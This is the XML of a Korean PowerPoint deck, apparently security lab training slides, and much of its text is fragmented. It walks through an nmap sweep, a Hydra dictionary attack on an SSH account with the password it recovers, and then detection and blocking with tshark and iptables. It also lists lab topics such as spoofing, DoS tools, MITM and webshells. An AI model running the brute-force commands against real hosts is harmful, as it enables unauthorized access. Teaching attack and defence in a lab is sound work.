          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561340" y="2838026"/>
            <a:ext cx="5019040" cy="434086"/>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B7C851B8-522B-416D-AB73-C1FA38C7270C}"/>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416455626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Hydra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test01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계정을 대상으로 사전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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243646248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서버가 위치한 네트워크 주소 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ifconfig</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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 네트워크 스캔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 10.10.1.0/24</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6688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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 사전 공격 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># hydra –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>wordlists/rockyou.txt ssh://10.10.1.14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획득한 계정 정보로 로그인 시도</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>test01@10.10.1.14</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종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 205">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{641E41BC-2181-4A24-9860-CB1DE03DC223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515620" y="1077806"/>
            <a:ext cx="4963668" cy="2660523"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 207">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD3FC64-78B4-4FEF-ADFF-317B4E741FC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515620" y="4247726"/>
            <a:ext cx="4963668" cy="1936242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 209">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E0EAF3-BD00-4E24-917C-541DE2C73735}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276340" y="841586"/>
            <a:ext cx="4932299" cy="1906524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 211">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9784306D-6D5E-4942-8586-70E08559BD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276340" y="3194366"/>
            <a:ext cx="4563491" cy="1431290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{752B0B64-EE1D-4AE6-9057-DB2AD754F4B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="5212080"/>
            <a:ext cx="5616792" cy="127691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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>알아낸 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정의 비밀번호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test123</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2334705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0" y="3152898"/>
            <a:ext cx="4815445"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(60%)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6466116" y="2260233"/>
            <a:ext cx="2719452"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(30%)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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124124887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81B9CBF-A5B3-468D-8635-097A577D36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서버에 원격 접속하는 사용자를 모니터링 하고자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라는 패킷 분석 툴을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원격접속을 시도 중인 프로토콜과 사용자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정보를 탐지하고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의심되는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카운터 및 저장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200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확인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명령</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INPUT -s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-j DROP</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계정 비인가 접속을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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352866487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보안 로그 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 원격접속 패킷 저장 후 확인</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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.1.169</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 로그인 시도를 하고 있음 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>해당 계정의 비밀번호 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>passwd test01</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무작위 공격 시도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>차단</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–A INPUT –s IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–j DROP</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 213">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D6AC6CE-5568-40D0-9A0E-7CBAEA27D1CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1" r="200" b="50518"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="529203" y="1077475"/>
            <a:ext cx="4941294" cy="1371527"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 215">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3226F2-D95F-4C7A-A031-E5395AF94290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="499029" y="3213138"/>
            <a:ext cx="5001641" cy="804545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 217">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A4D9A2-400E-4443-9DFF-059E3D0274AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="529203" y="4521715"/>
            <a:ext cx="4954016" cy="1767840"/>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41FCE32E-C979-4B56-9233-FE6E734747D9}"/>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3972431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482505375"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1798320" y="1550471"/>
          <a:ext cx="8563556" cy="5171313"/>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텔넷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Finger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mailx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스팸 메일 릴레이 서비스 제한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OpenSSL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IP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>접근 통제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FTP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>패킷 탐지</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nmap</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스캔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ARP Spoofing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IP Spoofing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11</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r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>, 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SYN Flooding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r>
                        <a:rPr lang="en-US"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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>iftop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Ping </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>of Death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Saddam.py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Amplification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Slowloris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RUDY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snort</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>, iptables </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정보보호체계 정책 설정 및 로그 분석</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hunt-1.5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TCP Session </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>Hijacking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ettercap, etterfilter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MITM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4"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7007054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네트워크 실습</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 219">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBE03927-5141-4536-ACA1-DC9479CA7525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3514477" y="1706862"/>
            <a:ext cx="5224861" cy="3597574"/>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954544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/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1. NIS(+) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서비스 제한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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(Network Information Service)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>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라고 불리는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RPC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서비스로서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portmap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다른 관련 서비스들과 함께 사용되어 동일한 도메인에 위치한 컴퓨터에 사용자명</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암호와 다른 기밀 정보를 배포하는 기능을 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서비스는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청취하기 때문에 보안에 취약합니다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10.10.1.0~127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범위안의 네트워크에서만 수용 할 수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>있도록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수정</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>) 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청취한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>. 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적절한 네트워크에서 들어오는 요청만 응답하도록 넷마스크</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네트워크 쌍을 입력해줘야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 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 Linux / 10.10.1.166)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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>클라이언트</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6.5 / 10.10.1.133)</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17446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10.10.1.166(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>NIS Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(PW : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>toor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> root@10.10.1.166</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221">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20171223-DF75-40D6-9C77-50F6467676B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="3252" b="2449"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="846887"/>
            <a:ext cx="5224441" cy="188041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7005894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31073139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702577097"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1814222" y="2138868"/>
          <a:ext cx="8563556" cy="3201289"/>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SQL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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>- Directory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파일 다운로드 취약점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민감 데이터 노출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인증 및 세션 관리 취약점</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기능 수준의 접근 통제 누락</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Webshell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검증되지 않은 리 다이렉트 및 포워드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크로스 사이트 요청 변조</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(CSRF)</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알려진 취약점이 있는 컴포넌트 사용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bash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 설정 오류</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>웹</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4"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7437956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6692568" y="1797549"/>
            <a:ext cx="4463112" cy="4427675"/>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웹 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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가즈아</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7" name="Picture 222">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A931CF-DED8-48DD-A0E3-FD16E8E2E1B3}"/>
